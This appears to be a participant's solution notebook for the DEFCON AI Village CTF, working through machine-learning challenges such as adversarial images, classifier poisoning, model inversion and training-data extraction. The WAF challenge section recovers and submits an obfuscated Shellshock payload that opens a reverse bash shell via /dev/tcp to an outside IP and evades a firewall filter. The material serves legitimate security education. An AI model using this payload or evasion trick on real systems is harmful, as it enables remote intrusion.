# CTF Template

Welcome to the DEFCON AI Village Capture-the-Flag (CTF). Feel free to copy this notebook and use it as the foundation for your submissions.

## Intro

Help Henry Hacker get to Homecoming! In this series of challenges, you'll be interacting with various machine learning models. You're welcome to use this notebook as a template, but you can also use any other resources. The `Submission Helper` code is only there to show you how to interact with a challenge; you're encouraged to write your own. There are no fake flags, so if you get back a 256-character string, you found it! Collect those flags, add them next to their corresponding challenge in `solution.csv` (provided), and submit them to the scoreboard. We've provided an `add_flag()` function to help with this. There's no limit on how many times you can try the challenges, but you can only submit `solution.csv` to the scoreboard 50 times per day.

CTFs are inherently puzzles that are intended to challenge you and help you learn new things. Sometimes they may be a little ambiguous or misleading. That's part of the challenge! However, if you feel like a challenge or piece of infrastructure isn't working correctly, contact the organizers through the Kaggle discussion board or the Discord channel.

In [None]:
# We're just importing some stuff to make sure the challenges and helper code work.
# Feel free to import anything else you need (or solve in a different language), but if you overwrite these, provided code may not work.

import base64
import concurrent.futures
import functools
import itertools
import json
import os
import shutil
import time
import warnings
from pathlib import Path
from typing import Callable

import cv2
import joblib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import requests
import sklearn
import tensorflow as tf
import tensorflow.keras
import torch.nn.functional as F
import torch
import tqdm
from IPython.display import Image as Ima
from IPython.display import clear_output, display
from matplotlib import colors, ticker
from PIL import Image as Im
from PIL import ImageOps
from scipy import ndimage as ndi
from skimage.feature import canny
from sklearn import manifold, datasets
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torchvision import models

warnings.filterwarnings("ignore")
dir_name = "ai-village-ctf"
IMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406)
IMAGENET_DEFAULT_STD = (0.229, 0.224, 0.225)

# Input data files are available in the read-only "../input/" directory
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All" 
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session

# HOTDOG (id: hotdog) -- 200 Points

### Scenario

This is Chester. He's heard of Hotdog/Not Hotdog, but really wants to be classified as a hot-dog (get it?).

### Objective

Help Chester classify as a hotdog.

In [None]:
Ima(filename=f'{dir_name}/hotdog/chester.png')

In [None]:
Ima(filename=f"{dir_name}/hotdog/Hot_dog_with_mustard.png")

In [None]:
# Submission Helper

IMAGE_DIMS = (224, 224)

img = Im.open(f"{dir_name}/hotdog/Hot_dog_with_mustard.png")
img = img.resize(IMAGE_DIMS).convert('RGB')
img_bytes = img.tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)

try:
    r = requests.post("https://hotdog.fly.dev/score", data=json.dumps({"input": b64_img_bytes.decode()}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Math

This series of "Math" challenges is designed to introduce the concepts of dimensionality.

Data is often represented in a high-dimensional space, but actually consists of several intrinsically low-dimensional components that can be diagnosed. Intrinsic low-dimensionality is incredibly important to machine learning because many ML algorithms rely on it. Medical EKG data is a single intrinsically 2-dimensional component, despite often being represented in 100 dimensions or more. The classic MNIST dataset is several components of 8-10 dimensions, depending on the digit's class, despite being represented in 784 dimensions. The 4 math challenges focus on this problem. **If you need a hint, ask Sven at the Art Booth.**
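As a rough illustration of what "intrinsically low-dimensional" means, here is a minimal sketch that counts how many principal components carry a meaningful share of the variance. It runs on synthetic data (a 3-dimensional Gaussian pushed into 50 dimensions), not on the challenge files, and the helper name `estimate_linear_dimension` and the 1% threshold are my own assumptions. It only detects flat (linear) structure, so curved manifolds would need a different tool.

```python
import numpy as np


def estimate_linear_dimension(data: np.ndarray, variance_threshold: float = 0.01) -> int:
    """Count principal components that each explain more than `variance_threshold` of the variance."""
    centered = data - data.mean(axis=0)
    singular_values = np.linalg.svd(centered, compute_uv=False)
    explained = singular_values**2 / np.sum(singular_values**2)
    return int(np.sum(explained > variance_threshold))


# Synthetic stand-in: 3 latent dimensions embedded linearly in 50, plus tiny noise.
demo_rng = np.random.default_rng(0)
latent = demo_rng.normal(size=(200, 3))
projection = demo_rng.normal(size=(3, 50))
observed = latent @ projection + 1e-3 * demo_rng.normal(size=(200, 50))

estimated_dim = estimate_linear_dimension(observed)
print(estimated_dim)
```

The threshold is a judgment call: on real data it is usually worth plotting the explained-variance curve and looking for the elbow rather than trusting a fixed cutoff.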

# Math Challenge 1 (id: math_1) -- 100 Points

How many clusters are in the clusters1.npy, clusters2.npy, and clusters3.npy? The key is the number of clusters in order, with no spaces. These files are available in the input directory under `math`.
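One way to approach a question like this, sketched below on made-up 2-D blobs rather than the real `.npy` files, is to link every pair of points closer than some radius and count the connected components. The function name `count_clusters` and the radius `eps` are assumptions for illustration; picking a sensible `eps` for the real data would take some exploration (for example, a histogram of pairwise distances).

```python
import numpy as np


def count_clusters(points: np.ndarray, eps: float) -> int:
    """Count connected components of the graph linking points closer than `eps`."""
    n = len(points)
    # Dense pairwise distances: fine for a few thousand points, too big beyond that.
    diffs = points[:, None, :] - points[None, :, :]
    adjacency = np.linalg.norm(diffs, axis=-1) < eps

    labels = np.full(n, -1)
    n_clusters = 0
    for start in range(n):
        if labels[start] != -1:
            continue
        # Flood-fill everything reachable from `start`.
        stack = [start]
        labels[start] = n_clusters
        while stack:
            current = stack.pop()
            for neighbor in np.flatnonzero(adjacency[current] & (labels == -1)):
                labels[neighbor] = n_clusters
                stack.append(neighbor)
        n_clusters += 1
    return n_clusters


# Synthetic stand-in: three well-separated Gaussian blobs.
demo_rng = np.random.default_rng(0)
centers = np.array([[0.0, 0.0], [10.0, 10.0], [20.0, 0.0]])
blobs = np.concatenate([c + 0.5 * demo_rng.normal(size=(50, 2)) for c in centers])

n_found = count_clusters(blobs, eps=3.0)
print(n_found)
```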

In [None]:
# Submission Helper

solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_1", "submission": str(solution)}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1
        
# Solution: 523

# Math Challenge 2 (id: math_2) -- 200 Points

What's the dimensionality of the data in first_dim1.npy, first_dim2.npy, and first_dim3.npy? The key is the number of dimensions in order, with no spaces.  These files are available in the input directory under `math`.

In [None]:
# Submission Helper

solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_2", "submission": solution}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1
        
# Solution: 354

# Math Challenge 3 (id: math_3) -- 300 Points

What's the dimensionality of the data in second_dim1.npy, second_dim2.npy, and second_dim3.npy? The key is the number of clusters in order, with no spaces.  These files are available in the input directory under `math`.

In [None]:
# Submission Helper

solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_3", "submission": solution}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1
        
# Solution: 474

# Math Challenge 4 (id: math_4) -- 400 Points

What's the dimensionality of the clusters in clusters1.npy? The key is the dimensions ordered by cluster size (smallest to largest), with no spaces.  These files are available in the input directory under `math`.

In [None]:
solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_4", "submission": solution}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1

# Solution: 54312

# WIFI (id: wifi) -- 200 Points

### Scenario

You really need to check your email, but unfortunately you don't know the password. Fortunately, someone wrote it down. Unfortunately, it's written down on a low-dimensional manifold embedded in a very high-dimensional space. Check out the `wifi/Embedded_characters.npz` file -- a list of tokens is given in the `tokens` key, with their corresponding embeddings in the same order under the `embeddings` key -- and recover the password.

### Objective

The password is your flag. Like all others, it has the format `FLAG{something}`.
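To make the "characters on a 1-D manifold" idea concrete, here is a small sketch on synthetic data: characters are placed along a helix, shuffled, and then put back in order with a greedy nearest-neighbor walk. This is a simpler stand-in, not the manifold-learning approach used in this notebook, and it assumes you already know which token comes first. The message, the helix, and the helper `order_along_curve` are all made up for illustration.

```python
import numpy as np


def order_along_curve(points: np.ndarray, start: int) -> list[int]:
    """Greedy walk: from `start`, repeatedly hop to the closest unvisited point."""
    remaining = set(range(len(points)))
    remaining.remove(start)
    order = [start]
    while remaining:
        candidates = np.array(sorted(remaining))
        distances = np.linalg.norm(points[candidates] - points[order[-1]], axis=1)
        nearest = int(candidates[np.argmin(distances)])
        order.append(nearest)
        remaining.remove(nearest)
    return order


# Synthetic stand-in: one character per point along a helix, then shuffled.
message = "FLAG{DEMO}"  # made-up string, not a real flag
t = np.linspace(0.0, 3.0 * np.pi, len(message))
helix = np.stack([np.cos(t), np.sin(t), 0.5 * t], axis=1)
shuffle = np.random.default_rng(0).permutation(len(message))
demo_tokens = [message[i] for i in shuffle]
demo_points = helix[shuffle]

start_index = demo_tokens.index("F")  # assumption: the first character is known
recovered = "".join(demo_tokens[i] for i in order_along_curve(demo_points, start_index))
print(recovered)
```

A greedy walk breaks down when the curve folds back close to itself or when tokens repeat, which is where a proper 1-D embedding earns its keep.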

In [None]:
wifi_file = np.load(f"{dir_name}/wifi/Embedded_characters.npz")
tokens = wifi_file["tokens"].item()
embeddings = wifi_file["embeddings"]
print("Number of tokens:", len(tokens))
print("Embeddings shape:", embeddings.shape)
print(tokens)

In [None]:
# This is all straight from the sklearn docs: 
# https://scikit-learn.org/stable/auto_examples/manifold/plot_compare_methods.html#sphx-glr-auto-examples-manifold-plot-compare-methods-py
def add_2d_scatter(ax, points, points_color, title=None):
    x, y = points.T
    ax.scatter(x, y, c=points_color, s=50, alpha=0.8)
    ax.set_title(title)
    ax.xaxis.set_major_formatter(ticker.NullFormatter())
    ax.yaxis.set_major_formatter(ticker.NullFormatter())
    
    
rng = np.random.RandomState(0)
n_neighbors = 12  # neighborhood which is used to recover the locally linear structure
n_components = 2  # number of coordinates for the manifold
params = {
    "n_neighbors": n_neighbors,
    "n_components": n_components,
    "eigen_solver": "auto",
    "random_state": rng,
}

lle_standard = manifold.LocallyLinearEmbedding(method="standard", **params)
S_standard = lle_standard.fit_transform(embeddings)

lle_ltsa = manifold.LocallyLinearEmbedding(method="ltsa", **params)
S_ltsa = lle_ltsa.fit_transform(embeddings)

lle_hessian = manifold.LocallyLinearEmbedding(method="hessian", **params)
S_hessian = lle_hessian.fit_transform(embeddings)

lle_mod = manifold.LocallyLinearEmbedding(method="modified", modified_tol=0.8, **params)
S_mod = lle_mod.fit_transform(embeddings)

fig, axs = plt.subplots(
    nrows=2, ncols=2, figsize=(7, 7), facecolor="white", constrained_layout=True
)
fig.suptitle("Locally Linear Embeddings", size=16)

lle_methods = [
    ("Standard locally linear embedding", S_standard),
    ("Local tangent space alignment", S_ltsa),
    ("Hessian eigenmap", S_hessian),
    ("Modified locally linear embedding", S_mod),
]
for ax, method in zip(axs.flat, lle_methods):
    name, points = method
    add_2d_scatter(ax, points, np.arange(len(tokens)), name)

plt.show()

In [None]:
lle_ltsa = manifold.LocallyLinearEmbedding(
    method="ltsa",
    n_neighbors=n_neighbors,
    n_components=1,
    eigen_solver="auto",
    random_state=rng,
)
embeddings_1d = lle_ltsa.fit_transform(embeddings)
tokens_to_embeddings = list(zip(tokens, embeddings_1d))
tokens_to_embeddings_ordered = sorted(tokens_to_embeddings, key=lambda x: x[1], reverse=True)
"".join([t2e[0] for t2e in tokens_to_embeddings_ordered])

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "wifi", "submission": "FLAG{TURNED}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# HOTTERDOG (id: hotterdog) -- 400 Points

### Scenario

Chester submitted himself in the "most creative hotdog" contest. They use machine vision to score the hotdogs, but oh no he already submitted his headshot.

### Objective

Help Chester classify as a hotdog, but it has to look like Chester to a human. Modify his picture to fool a classifier.

### Solution
I used this tutorial notebook to generate a bunch of adversarial examples:

https://github.com/Harry24k/adversarial-attacks-pytorch/blob/master/demos/White%20Box%20Attack%20(ImageNet).ipynb

Then, since that wasn't enough, I also overlaid Chester's image with hotdog images + random noise until I got lucky. See: `hotterdog/query.py` for the code. I've only included the final successful image though.
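The overlay-plus-noise step can be sketched roughly as below. `hotterdog/query.py` isn't reproduced in this notebook, so this is only my guess at the shape of the idea: the function name `blend_with_noise`, the blend weight, and the noise scale are all assumptions, and flat gray arrays stand in for the real images.

```python
import numpy as np


def blend_with_noise(base, overlay, alpha, noise_scale, rng):
    """Return (1 - alpha) * base + alpha * overlay + Gaussian noise, as valid uint8 pixels."""
    mixed = (1.0 - alpha) * base.astype(np.float64) + alpha * overlay.astype(np.float64)
    mixed = mixed + rng.normal(scale=noise_scale, size=mixed.shape)
    return np.clip(np.rint(mixed), 0, 255).astype(np.uint8)


demo_rng = np.random.default_rng(0)
chester_like = np.full((224, 224, 3), 100, dtype=np.uint8)  # stand-in for Chester
hotdog_like = np.full((224, 224, 3), 200, dtype=np.uint8)   # stand-in for a hotdog photo

# With no noise the result is a plain weighted average of the two images.
clean_blend = blend_with_noise(chester_like, hotdog_like, alpha=0.25, noise_scale=0.0, rng=demo_rng)
# With noise, every call produces a slightly different candidate to submit.
candidate = blend_with_noise(chester_like, hotdog_like, alpha=0.25, noise_scale=8.0, rng=demo_rng)
print(clean_blend[0, 0], candidate.shape, candidate.dtype)
```

Keeping `alpha` small is what keeps the picture looking like Chester to a human; the noise just gives each retry a different roll of the dice.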

In [None]:
IMAGE_DIMS = (224, 224)

img = Im.open(f"{dir_name}/hotterdog/successful_adversary.png")
img = img.resize(IMAGE_DIMS).convert('RGB')
img_bytes = img.tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)
try:
    r = requests.post("https://hotterdog.fly.dev/score", data=json.dumps({"input": b64_img_bytes.decode()}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")
    
# Solution: 9_DIFGSM.png + plenty of luck

# Honorstudent (id: honorstudent) -- 300 Points

### Scenario

Look at your report card! That's an F. You won't be able to go to homecoming with that grade. Can you use some carefully placed whiteout to fool your parents into thinking it's an A?

### Objective

Modify and submit your tampered `f.png`. Be careful to not overdo it!

### Solution

I used Windows Paint to draw an A, then ran the image through an online photo compressor to dodge the tampering detection.

In [None]:
Ima(filename=f'{dir_name}/honorstudent/f.png')

In [None]:
Ima(filename=f'{dir_name}/honorstudent/f_tampered-min.png')

In [None]:
# Submission Helper

with open(f"{dir_name}/honorstudent/f_tampered-min.png", "rb") as f:
    try:
        r = requests.post("https://honorstudent.fly.dev/score", files={"data_file": f})
        print(r.text)
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")

# Secret Sloth (id: sloth) -- 400 Points

### Scenario

The sloth in `secret.sloth/secret-sloth.png` has a very cool hat... and a secret message for you. The message is your flag.

### Objective 

The flag is in the image somewhere; as always, look for `FLAG{something}`

### Solution

Brute force over a list of English words from http://www.mieliestronk.com/wordlist.html

See `secret.sloth/sloth_query.py` for the code.

In [None]:
Ima(f"{dir_name}/secret.sloth/secret-sloth.png")

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "sloth", "submission": "FLAG{SPECTRAL}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Bad to Good (id: bad_to_good) -- 300 Points

### Scenario

You can’t buy a homecoming ticket unless you get classified as a “good student”. Can you help Henry poison the classifier? He can only access the grades for one of four classes, but he can influence everyone in that class.

### Objective

Modify and submit your tampered `csv`. Try and get Henry classified as a good student. Be careful to not overdo it!

In [None]:
math_df = pd.read_csv(f"{dir_name}/bad2good/math.csv")
henry_mask = math_df["FirstName"] == "Henry"
lots_of_9s = 0.999999999
math_df["Grade"] = np.where(
    henry_mask,
    200 + lots_of_9s,
    0
)
math_df["Score"] = np.where(
    henry_mask,
    100,
    0
)
math_df["Demerits"] = np.where(
    henry_mask,
    -1,
    9 + lots_of_9s
)
math_df["Absences"] = np.where(
    henry_mask,
    0,
    9 + lots_of_9s
)
math_df.to_csv(f"{dir_name}/bad2good/math_tampered.csv", index=False)
math_df

In [None]:
# Submission Helper

with open(f"{dir_name}/bad2good/math_tampered.csv", "r") as f:
    try:
        r = requests.post("https://bad2good.fly.dev/score", files={"data_file": f})
        print(r.text)
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")

# Inference (id: inference) -- 400 Points

### Scenario

Model model on the wall, who is the fairest of them all?

?gnidaer llits uoy era yhW .uoy htiw skcans thguorb ev'dluohs uoY .skcans rof pots t'noD .won oG .tsaf oG .niW .galf eht teG .ledom eht esreveR

### Objective

Retrieve the images that spell the flag. Wrap any text in `FLAG{}`

**If you need a hint, there's a guy named `moo` somewhere.**

In [None]:
letter_to_img = {}
for letter_path in Path(f"{dir_name}/inference/handwritten").glob("*.png"):
    img = Im.open(letter_path).resize((32, 32))
    img = ImageOps.grayscale(img)
    # Need to invert images, since many MNIST-style datasets expect white letters on black backgrounds
    img = ImageOps.invert(img)
    letter_to_img[letter_path.stem] = img
    
x = np.stack([
    np.array(img).astype(float) / 255.
    for img in letter_to_img.values()
])[:, :, :, None]
try:
    response = requests.post("https://inference.fly.dev/score", data = json.dumps({"input": x.tolist()}))
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")
    
letter_to_outputs = {}
for letter, output in zip(letter_to_img.keys(), response.json()["outputs"]):
    letter_to_outputs[letter] = np.round(np.array(output) * 100.) / 100.

letter_to_outputs

In [None]:
full_response_array = np.array(response.json()["outputs"])
candidate_letters = []
for column in full_response_array.T:
    candidate_letters.append([list(letter_to_img.keys())[i] for i in reversed(np.argsort(column))])
    
top_n = 5
candidate_letters = [letters[:top_n] for letters in candidate_letters]
candidate_letters

In [None]:
# To try and get the flag
def try_solution(candidate_string: str) -> str:
    sleep_counter = 1.
    while True:
        try:
            r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "inference", "submission": candidate_string}))
            return r.text
        except requests.exceptions.ConnectionError:
            print("Connection problems. Contact the CTF organizers.")
            time.sleep(sleep_counter)
            sleep_counter += 1.

            
with concurrent.futures.ThreadPoolExecutor() as executor:
    candidate_strings = [
        "FLAG{" + "".join(candidate) + "}"
        for candidate in itertools.product(*candidate_letters)
    ]
    future_to_candidate_string = {
        executor.submit(try_solution, candidate_string): candidate_string
        for candidate_string in candidate_strings
    }
    solution = None
    solution_response = None
    # Can't use concurrent.futures.as_completed without hanging or waiting for all requests to complete
    # https://tiewkh.github.io/blog/python-thread-pool-executor/
    for future, candidate_string in tqdm.tqdm(future_to_candidate_string.items()):
        if future.cancelled():
            continue
            
        response = future.result()
        if len(response) > 100:
            solution = candidate_string
            solution_response = response
            executor.shutdown(wait=False, cancel_futures=True)

if solution:
    time.sleep(0.5)
    print("Success!")
    print(f"Solution: {solution}")
    print(f"Response: {solution_response}")

# Baseball  (id: baseball) -- 300 Points

### Scenario

Henry has to miss baseball tryouts to get ready for his date. Can you cover for him? Henry is a pitcher and the team uses software to analyze pitch patterns to classify pitchers. 

### Objective

Throw 15 pitches at x,y (each bounded on [0,29]). Check out `test_pitch.json` to see the expected format. Can you throw 15 pitches to get classified as Henry?

### Solution

I searched over a grid of values (10,10 - 25,25) to find the locations that produced the most confident responses, then kept resampling pitches around those locations to brute-force the final solution.

In [None]:
def pitches_to_submission(pitches):
    submission = []
    pitches_set = set()
    for i, j in pitches:
        submission.append({
            "x": i.item(),
            "y": j.item(),
        })
        pitches_set.add((i, j))

    if len(pitches_set) < 15:
        return None
    
    return {"pitches": submission}
    

def generate_pitches_submission(x_loc: float, y_loc: float, max_retries=100):
    for i in range(max_retries):
        x_pitches_raw = np.random.normal(loc=x_loc, scale=3., size=(15, 1))
        y_pitches_raw = np.random.normal(loc=y_loc, scale=3., size=(15, 1))
        pitches_raw = np.concatenate([x_pitches_raw, y_pitches_raw], axis=-1)
        pitches = pitches_raw.astype(int).clip(0, 29)
        submission = pitches_to_submission(pitches)
        if submission:
            return submission
    
    raise RuntimeError(f"Failed to generate a valid submission in {max_retries} attempts.")

In [None]:
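def get_solution_value(submission, x_loc: int, y_loc: int) -> float:
    """Submit pitches and return the best "henry" confidence seen so far for this grid cell."""
    while True:
        try:
            r = requests.post("https://bball.fly.dev/score", json=submission)
            print(f"x_loc: {x_loc}, y_loc: {y_loc}: {r.text}")
            break
        except requests.exceptions.ConnectionError:
            print("Connection problems. Contact the CTF organizers.")
            time.sleep(1.)
    
    if "Bring the heat!" in r.text:
        print(f"Submission: {submission}")
        raise RuntimeError("Solution found!")
    
    # .get() avoids a KeyError on the first visit to a cell and keeps an earlier, better score.
    previous_best = best_solutions.get((x_loc, y_loc), -1.0)
    if "henry" in r.text:
        # Assumes the confidence value sits at this fixed offset in the response text.
        return max(previous_best, float(r.text[79:85]))
    
    return previous_best


best_solutions = {}
for x in range(10, 25):
    for y in range(10, 25):
        submission = generate_pitches_submission(x_loc=x, y_loc=y)
        best_solutions[(x, y)] = get_solution_value(submission, x, y)

# Revisit cells from most to least confident, resampling pitches around each one.
for (x, y), _ in sorted(best_solutions.items(), key=lambda item: item[1], reverse=True):
    for n_attempts in range(25):
        submission = generate_pitches_submission(x_loc=x, y_loc=y)
        best_solutions[(x, y)] = get_solution_value(submission, x, y)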

In [None]:
# x_loc: 13, y_loc: 13, scale=3.
henry_pitches = {
    'pitches': [
        {'x': 11, 'y': 13}, 
        {'x': 17, 'y': 12},
        {'x': 15, 'y': 11},
        {'x': 10, 'y': 17},
        {'x': 12, 'y': 8},
        {'x': 11, 'y': 3},
        {'x': 10, 'y': 8},
        {'x': 10, 'y': 18},
        {'x': 15, 'y': 13}, 
        {'x': 18, 'y': 9},
        {'x': 15, 'y': 12}, 
        {'x': 16, 'y': 11}, 
        {'x': 13, 'y': 12}, 
        {'x': 9, 'y': 13},
        {'x': 11, 'y': 16}
    ]
}
with open(f"{dir_name}/baseball/henry_pitches.json", "w") as f:
    json.dump(henry_pitches, f)

try:
    r = requests.post("https://bball.fly.dev/score", json=henry_pitches)
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# WAF (id: waf) -- 500 Points

### Scenario

An ML model has been built to detect a 0-day. This model is used by a Web Application Firewall to block malicious requests.

### Objective

The goal of the challenge is to discover what the 0-day is by what it is blocking, and then bypass the WAF to exploit the system.

PS: The WAF assesses malicious strings in 5-character blocks.

In [None]:
def get_previous_character(final_four: str, verbose: bool = True) -> str | None:
    assert len(final_four) == 4
    for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/":
        combined = c + final_four
        data = json.dumps(
            {"input": combined}
        )
        r = requests.post("https://waf.fly.dev/score", data=data)
        if verbose:
            print(f"{c} - {combined}: {r.text}")
            
        if "MALICIOUS REQUEST CAUGHT BY WAF" in r.text:
            return c
    
    return None


def get_next_character(first_four: str, verbose: bool = True) -> str | None:
    assert len(first_four) == 4
    for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/":
        combined = first_four + c
        data = json.dumps(
            {"input": combined}
        )
        r = requests.post("https://waf.fly.dev/score", data=data)
        if verbose:
            print(f"{c} - {combined}: {r.text}")
            
        if "MALICIOUS REQUEST CAUGHT BY WAF" in r.text:
            return c
    
    return None
        

def decode_forward(seed_characters: str) -> str:
    assert len(seed_characters) >= 4
    string_so_far = seed_characters
    while True:
        next_character = get_next_character(string_so_far[-4:], verbose=False)
        if next_character is None:
            break
            
        string_so_far += next_character
        print(string_so_far)
    
    print(f"Done. Final string: {string_so_far}")
    return string_so_far


def decode_backward(seed_characters: str) -> str:
    assert len(seed_characters) >= 4
    string_so_far = seed_characters
    while True:
        previous_character = get_previous_character(string_so_far[:4], verbose=False)
        if previous_character is None:
            break
            
        string_so_far = previous_character + string_so_far
        print(string_so_far)
    
    print(f"Done. Final string: {string_so_far}")
    return string_so_far


start = decode_backward("mFzaC")
# This will loop infinitely, so you'll need to interrupt once it's caught in the .227 loop
decode_forward(start)

In [None]:
def is_valid_string(input_string: str) -> bool:
    try:
        base64.b64decode(input_string.encode()).decode()
        return True
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return False
    

string = 'KCkgeyA6O307IC9iaW4vYmFzaCAtaSA+JiAvZGV2L3RjcC8yMjcuMjI3LjIyNy4yMjc='
print(is_valid_string(string))
# This will turn a string back to its original form
base64.b64decode(string.encode())

In [None]:
# Run this to encode a string to an input_string-compatible format
# I just added some spaces + a variable to dodge the WAF
base64.b64encode(b' () { :;}; a=227; /bin/bash -i >&  "/dev/tcp/{$a}.{$a}.{$a}.{$a}"')

In [None]:
# Solution: base64.b64encode(b' () { :;}; a=227; /bin/bash -i >&  "/dev/tcp/{$a}.{$a}.{$a}.{$a}"')
input_string = 'ICgpIHsgOjt9OyBhPTIyNzsgL2Jpbi9iYXNoIC1pID4mICAiL2Rldi90Y3AveyRhfS57JGF9LnskYX0ueyRhfSI='
try:
    data = json.dumps(
        {"input": input_string}
    )
    r = requests.post("https://waf.fly.dev/score", data=data)
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Excuse me, your training data is leaking (id: leakage) -- 200 Points

### Scenario

While digging around a poorly secured S3 bucket, you found an old version of a pretrained char-RNN model (`leakage/pretrained_model.pt`). The scripts in the same bucket suggest that -- in addition to doorstop Russian literature -- it was accidentally trained on a whole load of system files, including an unencrypted password file!  Those files aren't around anymore, but you've got the model weights, and you've found an old myspace login: "xXx_SkynetKilla_xXx" (they were 13 at the time, and would rather forget the whole thing, thank you very much). Can you recover their password?

The following code should allow you to load the model and featurize a string for use in the model.
```python
import torch
from torch import nn
from torch.nn import functional as F

class LM(nn.Module):
    def __init__(self):
        super(LM, self).__init__()
        self.E = nn.Embedding(256, 32)
        self.LSTM = nn.LSTM(32,128, 2, batch_first=True, dropout=.1)
        self.predict = nn.Sequential(
            nn.Linear(128, 128),
            nn.LayerNorm(128),
            nn.ELU(),
            nn.Linear(128, 256)
        )
    def forward(self, x):
        h = self.E(x)
        h = self.LSTM(h)[0][:,-1,:]
        h = self.predict(h)
        return h

def featurize(s):
    return torch.Tensor([[int(ord(x)) for x in s]]).long()

model = LM()
model.load_state_dict(torch.load("pretrained_model.pt"))
```


### Objective

The password is your flag. As usual, it is in the format `FLAG{something}`.


In [None]:
import torch
from torch import nn
from torch.nn import functional as F

class LM(nn.Module):
    def __init__(self):
        super(LM, self).__init__()
        self.E = nn.Embedding(256, 32)
        self.LSTM = nn.LSTM(32,128, 2, batch_first=True, dropout=.1)
        self.predict = nn.Sequential(
            nn.Linear(128, 128),
            nn.LayerNorm(128),
            nn.ELU(),
            nn.Linear(128, 256)
        )
        
    def forward(self, x):
        h = self.E(x)
        h = self.LSTM(h)[0][:,-1,:]
        h = self.predict(h)
        return h

    
def featurize(s):
    return torch.Tensor([[int(ord(x)) for x in s]]).long()


def unfeaturize(t: torch.Tensor) -> str:
    indices = t.argmax(dim=-1)
    return "".join([chr(i) for i in indices])


def get_next_char(seed: str) -> str:
    return unfeaturize(model(featurize(seed)))


def get_next_n_chars(seed: str, n: int) -> str:
    for i in range(n):
        seed += get_next_char(seed)
    
    return seed


model = LM()
model.load_state_dict(torch.load(f"{dir_name}/leakage/pretrained_model.pt"))
model.eval()  # disable LSTM dropout so greedy decoding is deterministic
get_next_n_chars("xXx_SkynetKilla_xXx", 100)

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "leakage", "submission": "FLAG{s4RaHc0Nnor<3<3}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# FORENSICS (id: forensics) -- 300 Points

### Scenario

ML models have a lot of information stored within them that you might not realise is useful, such as the model architecture and model name.
For this challenge, we've swapped out the model name with the flag in the attached file.

### Objective

Retrieve the flag from the attached file (`defcon-ai-village-ctf/forensics/forensics.h5`). Try to do it by viewing the model in keras rather than just looking through the file :)
PS: replace the () characters with {} in the flag submission.

In [None]:
model = tf.keras.models.load_model(f"{dir_name}/forensics/forensics.h5")
model.summary()

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "forensics", "submission": "FLAG{F0R3NS1C5_XD}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# THEFT (id: theft) -- 100 Points

### Scenario

A client has spun up a website to identify images. Is there a way to steal their machine learning model and use the knowledge within it to backdoor this photo of an owl to be a turtle (loggerhead)?

### Objective

The goal of this challenge is to steal the model to do an offline evasion attack against it. A useful resource to get started is: https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20 

### Solution

I used the same method for adversary generation as in Hotterdog: 

https://github.com/Harry24k/adversarial-attacks-pytorch/blob/master/demos/White%20Box%20Attack%20(ImageNet).ipynb

One of the adversaries worked.

In [None]:
img_bytes = Im.open(f"{dir_name}/theft/successful_adversary.png").tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)
data = {
    "input": b64_img_bytes.decode()
}
try:
    r = requests.post("https://theft.fly.dev/score", data=json.dumps(data))
